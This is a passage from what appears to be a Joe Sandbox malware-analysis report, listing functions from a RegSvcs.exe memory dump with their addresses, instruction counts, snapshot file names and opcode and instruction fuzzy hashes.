                                                            • Opcode Fuzzy Hash: 7a94d9393fa37c214263f6bf51137505aa3daa8a3754a3d0ce7b3e4338763316
                                                            • Instruction Fuzzy Hash: 3DF087B0D0424ADFCB58DFA8C401AAEBFF1AF08300F4188A9D584EB221D7308602CF90
                                                            Function 012A2BC8 Relevance: .0, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4606152170.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_12a0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 21dbeec514ac4d036102add0f659c8d302294957a768d4ca6823c8def21cf242
                                                            • Instruction ID: a04331c16e1fbc3e032401f3f4bf6789cb6ed6961b329255f8e42db63d01a488
                                                            • Opcode Fuzzy Hash: 21dbeec514ac4d036102add0f659c8d302294957a768d4ca6823c8def21cf242
                                                            • Instruction Fuzzy Hash: 93F03AB0D1030EDFDB44DFA9C801AAEBBF5AB48300F4149A9D908E7200D77096008F90
                                                            Function 012A1948 Relevance: .0, Instructions: 27COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4606152170.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_12a0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: acc8fbbe7bb93f3a5990339255ce0ed5e082b632d34301a7087930ad70f752f3
                                                            • Instruction ID: 2a24e77c8fe4abb71ad4ca4f870e62ea47aeed5d160b103c1a7cbd769a32683f
                                                            • Opcode Fuzzy Hash: acc8fbbe7bb93f3a5990339255ce0ed5e082b632d34301a7087930ad70f752f3
                                                            • Instruction Fuzzy Hash: 1FF03075E10714AF8B34CFA9D80049AFBF9EF48720B00856AE555D3600D771EA14CBD0
                                                            Function 012A2B61 Relevance: .0, Instructions: 24COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4606152170.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_12a0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 62c22bf811fe02620dfd56beffe3f3829c42fc54ec7ef4ee8b08ef852437a6ef
                                                            • Instruction ID: efcb961774360564722684a535b8c6c1e55fffb842c146aff732eb18d0818841
                                                            • Opcode Fuzzy Hash: 62c22bf811fe02620dfd56beffe3f3829c42fc54ec7ef4ee8b08ef852437a6ef
                                                            • Instruction Fuzzy Hash: 8FF01CB0D14246DFC784DF78C54579ABFF0EF09304F2089A9C094DB221E7708602CB80
                                                            Function 012A2C59 Relevance: .0, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4606152170.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_12a0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 863c4e32930de3bb0c6b4e07f2adbd7a9680c366f08d563163114f64a6ff4e72
                                                            • Instruction ID: 054e91c0acb68bb3ffd5c2ee348f044abd7e5b94b4a2fb2520cc5c8350b692cd
                                                            • Opcode Fuzzy Hash: 863c4e32930de3bb0c6b4e07f2adbd7a9680c366f08d563163114f64a6ff4e72
                                                            • Instruction Fuzzy Hash: 8CE08C320182899FCB42DFE4D890EA17FF9AF1B31034554E2E684CF022D221A465EB11
                                                            Function 012A16C0 Relevance: .0, Instructions: 20COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4606152170.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_12a0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: db622fae8c5d361dbf74a5836e3eb19d954df7b5d3fed14e668c2374c77983f8
                                                            • Instruction ID: c91684688a78a05d543601b4f46a340cb54d3a874a18ccd92ae64ad00aced961
                                                            • Opcode Fuzzy Hash: db622fae8c5d361dbf74a5836e3eb19d954df7b5d3fed14e668c2374c77983f8
                                                            • Instruction Fuzzy Hash: 44D0A7B27591A62FC70222B858126E93B9E8B97614B4100E7D545CB193DA99CC4343EA
                                                            Function 012A2B70 Relevance: .0, Instructions: 18COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4606152170.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_12a0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e67e68a306e9ddd3d502689d6bf31c58525eddd81fdb72dcf2d526d481920931
                                                            • Instruction ID: e9f8e558aafe8617c70c74d30ce344fe929b254a5a1e5b269240574e2de1dc11
                                                            • Opcode Fuzzy Hash: e67e68a306e9ddd3d502689d6bf31c58525eddd81fdb72dcf2d526d481920931
                                                            • Instruction Fuzzy Hash: 4AE0B6B0D50209DFD740EFB9C905B5EBBF0BF08300F5189A9D019E7251E7B496048F91
                                                            Function 012A16D0 Relevance: .0, Instructions: 12COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4606152170.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_12a0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6f250fe8906cf6f8ea82814f7ef12499818290ffed1debf04653d1d02bdd1307
                                                            • Instruction ID: 4adee67ded4f2c4616f52afdff1878b4d4b813facb41b8321bd1371579c04b31
                                                            • Opcode Fuzzy Hash: 6f250fe8906cf6f8ea82814f7ef12499818290ffed1debf04653d1d02bdd1307
                                                            • Instruction Fuzzy Hash: 16B09B2171517613D904719D64109ED728E4785A65F400177A50E877455ED55D4102DD
                                                            Function 012A0253 Relevance: .0, Instructions: 11COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4606152170.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_12a0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ac348770829ecda40afa7c9ae510bdb9d61155d084565b876be1332f1f057251
                                                            • Instruction ID: a53b8d0b2d8a17e51209b30c3ea075f1fabd01409a4304764ee8ef37de627ac5
                                                            • Opcode Fuzzy Hash: ac348770829ecda40afa7c9ae510bdb9d61155d084565b876be1332f1f057251
                                                            • Instruction Fuzzy Hash: 1AD0C97086431ACFEF258FC5C82D7EEBB70FB08304F400419E011A6194CBB90949CF58